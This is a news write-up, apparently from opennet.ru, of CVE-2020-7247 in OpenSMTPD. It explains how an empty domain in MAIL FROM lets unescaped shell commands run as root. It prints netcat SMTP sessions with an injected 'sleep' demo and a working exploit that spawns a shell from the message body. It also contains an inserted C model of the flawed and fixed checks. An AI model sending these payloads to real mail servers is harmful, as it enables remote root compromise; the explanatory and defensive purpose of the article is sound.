Vulnerability in OpenSMTPD that allows remote code execution as root

A critical vulnerability (CVE-2020-7247) has been identified in OpenSMTPD, the mail server developed by the OpenBSD project, that allows shell commands to be executed remotely on the server with root privileges. The vulnerability was found during a re-audit conducted by Qualys Security (the previous audit of OpenSMTPD was carried out in 2015; the new vulnerability has been present since May 2018). The problem is fixed in the OpenSMTPD 6.6.2 release. All users are advised to install the update urgently (on OpenBSD, the patch can be installed via syspatch).

Two attack variants have been proposed. The first works in the default OpenSMTPD configuration (accepting connections only from localhost) and allows the problem to be exploited locally, when the attacker can reach the server's loopback interface (for example, on shared hosting systems). The second applies when OpenSMTPD is configured to accept connections from the network (a mail server that receives third-party mail). The researchers have prepared a prototype exploit that works both against the OpenSMTPD shipped with OpenBSD 6.6 and against the portable version for other operating systems (tested on Debian Testing).

The problem is caused by an error in the smtp_mailaddr() function, which is called to check the validity of the values in the "MAIL FROM" and "RCPT TO" fields that specify the sender and recipient and are transmitted during the connection to the mail server. To check the part of the address before the "@" character, smtp_mailaddr() calls valid_localpart(), which treats the characters "!#$%&'*/?^`{|}~+-=_" as allowed (MAILADDR_ALLOWED), as required by RFC 5322.

The string is then escaped in the mda_expand_token() function, which escapes only the characters "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). The string prepared in mda_expand_token() is later used when the delivery agent (MDA) is invoked with 'execle("/bin/sh", "/bin/sh", "-c", mda_command, …'. For delivery of mail to an mbox via /bin/sh, the line "/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}" is executed, where the value of "%{mbox.from}" contains the escaped data from the "MAIL FROM" parameter.

The essence of the vulnerability is a logic error in smtp_mailaddr(): if the domain part of the address is empty, the function returns success even when the part of the address before "@" contains invalid characters. Then, when the string is prepared by mda_expand_token(), not all shell metacharacters are escaped, only the special characters that are permitted in a mail address. Thus, to run an arbitrary command, it is enough to use ";" and a space in the local part of the address, neither of which is in the MAILADDR_ESCAPE set, so neither is escaped. For example:

$ nc 127.0.0.1 25

HELO professor.falken
MAIL FROM:<;sleep 66;>
RCPT TO:
DATA
.
QUIT

After this session, when delivering to the mbox, OpenSMTPD will run the following command via the shell:

/usr/libexec/mail.local -f ;sleep 66; root
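The two defects described above, as an added example (a simplified model written for this article, not OpenSMTPD's source; the function names, the alphanumeric-plus-dot rule and the byte-for-byte ':' replacement are assumptions): the vulnerable address check beside a hardened one, and the escaping that leaves ';' and ' ' untouched.

```c
/* Added example, not OpenSMTPD's source: a simplified model of the checks the
 * article describes, showing why an empty domain skips local-part validation
 * and why the MDA escaping leaves ';' and ' ' intact. */
#include <ctype.h>
#include <string.h>

#define MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"  /* allowed in local part (RFC 5322) */
#define MAILADDR_ESCAPE  "!#$%&'*?`{|}~"       /* replaced by ':' before the MDA runs */

/* A local part is valid if every byte is alphanumeric, '.', or in MAILADDR_ALLOWED. */
int valid_localpart(const char *s)
{
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && *s != '.' && !strchr(MAILADDR_ALLOWED, *s))
            return 0;
    return 1;
}

/* Vulnerable shape (modelled on the article's description, not the real code):
 * with an empty domain the address is accepted before the local part is checked. */
int mailaddr_check_vulnerable(const char *local, const char *domain)
{
    if (domain[0] == '\0')
        return 1;                       /* bug: ";sleep 66;" passes here */
    return valid_localpart(local);
}

/* Hardened shape: the local part is validated whether or not a domain is given. */
int mailaddr_check_fixed(const char *local, const char *domain)
{
    (void)domain;                       /* domain defaulting omitted from the model */
    return valid_localpart(local);
}

/* Model of the MDA escaping: bytes in MAILADDR_ESCAPE become ':'; everything else,
 * including the shell metacharacters ';' and ' ', is copied through unchanged. */
char *mda_escape(const char *in, char *out, size_t outlen)
{
    size_t i;
    for (i = 0; in[i] != '\0' && i + 1 < outlen; i++)
        out[i] = strchr(MAILADDR_ESCAPE, in[i]) ? ':' : in[i];
    out[i] = '\0';
    return out;
}
```

With the article's local part ";sleep 66;" and an empty domain, mailaddr_check_vulnerable() returns 1 and mailaddr_check_fixed() returns 0, while mda_escape() turns '$' and '|' into ':' but passes ';' and the space through.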

At the same time, the possibilities for attack are limited by the fact that the local part of the address cannot exceed 64 characters and that the special characters '$' and '|' are replaced with ":" during escaping. To get around this limitation, the exploit relies on the fact that the message body is passed to /usr/libexec/mail.local on its standard input after the program has been started: the address is used only to launch the sh command interpreter, and the body of the message serves as the set of instructions. Since the service SMTP headers come at the beginning of the message, it is suggested to skip them with a loop of read commands. The working exploit looks something like this:

$ nc 192.168.56.143 25

HELO professor.falken
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 abcd;do read r;done;sh;exit 0;>
RCPT TO:[email protected]>
DATA
#0
#1
...
#d
for i in WOPR; do
echo -n "($i) " && id || break
done > /root/x."`id -u`"."$$"
.
QUIT

Source: opennet.ru
